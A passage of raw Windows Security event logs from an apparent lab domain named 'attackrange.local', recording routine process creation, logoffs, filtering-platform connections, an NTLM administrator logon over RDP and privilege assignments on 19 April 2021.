Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\system32\TSTheme.exe -Embedding
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:30 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887080
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: Administrator
Account Domain: ATTACKRANGE
Logon ID: 0x1ACA0B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:30 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278809
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
New Process ID: 0x11b4
New Process Name: C:\Windows\System32\TSTheme.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x2d4
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\system32\TSTheme.exe -Embedding
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:30 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=278808
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x88628
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:32 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887089
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:32 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887088
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:32 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887087
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:32 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887086
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:32 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887085
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:32 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887084
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:32 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887083
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:32 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887082
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:32 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278810
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53908
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887092
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8CEA88
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887091
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1262
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887090
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1262
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:36 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278811
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x11b4
Process Name: C:\Windows\System32\TSTheme.exe
Exit Status: 0x0
04/19/2021 06:27:36 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887093
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x1B9F2C
Process Information:
Process ID: 0x1548
Process Name: C:\Windows\System32\TSTheme.exe
Exit Status: 0x0
04/19/2021 06:27:37 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278812
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53909
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:37 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887098
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:37 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887097
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:37 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887096
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Outbound
Source Address: fe80::ffff:ffff:fffe
Source Port: 135
Destination Address: ff02::1:ff00:4c4f
Destination Port: 0
Protocol: 58
Filter Information:
Filter Run-Time ID: 69912
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:37 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887095
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 70370
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:37 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887094
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 68
Protocol: 17
Filter Information:
Filter Run-Time ID: 70020
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:38 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887100
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1263
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:38 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887099
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1263
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:41 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887110
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x828
Process Name: C:\Windows\System32\smss.exe
Exit Status: 0x0
04/19/2021 06:27:41 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887109
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1648
New Process Name: C:\Windows\System32\winlogon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x828
Creator Process Name: C:\Windows\System32\smss.exe
Process Command Line: winlogon.exe
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:41 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887108
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b0c
New Process Name: C:\Windows\System32\csrss.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x828
Creator Process Name: C:\Windows\System32\smss.exe
Process Command Line: %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:41 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887107
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x828
New Process Name: C:\Windows\System32\smss.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x140
Creator Process Name: C:\Windows\System32\smss.exe
Process Command Line: \SystemRoot\System32\smss.exe 000000f8 0000007c
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:41 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887106
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:41 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887105
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:41 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887104
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: ATTACKRANGE\Administrator
Account Name: Administrator
Account Domain: ATTACKRANGE
Logon ID: 0x8D0FEC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 174.27.138.219
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): NTLM V2
Key Length: 128
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:41 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887103
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: Administrator
Account Domain: ATTACKRANGE
Logon ID: 0x8D0FEC
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 06:27:41 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4776
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Credential Validation
OpCode=Info
RecordNumber=887102
Keywords=Audit Success
Message=The computer attempted to validate the credentials for an account.
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon Account: administrator
Source Workstation:
Error Code: 0x0
04/19/2021 06:27:41 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887101
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 174.27.138.219
Source Port: 60806
Destination Address: 10.0.1.14
Destination Port: 3389
Protocol: 6
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887129
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x1B9F2C
Process Information:
New Process ID: 0x175c
New Process Name: C:\Windows\System32\TSTheme.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x34c
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\system32\TSTheme.exe -Embedding
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=887128
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x278
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=887127
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x278
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887126
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x8DB827
Privileges: SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
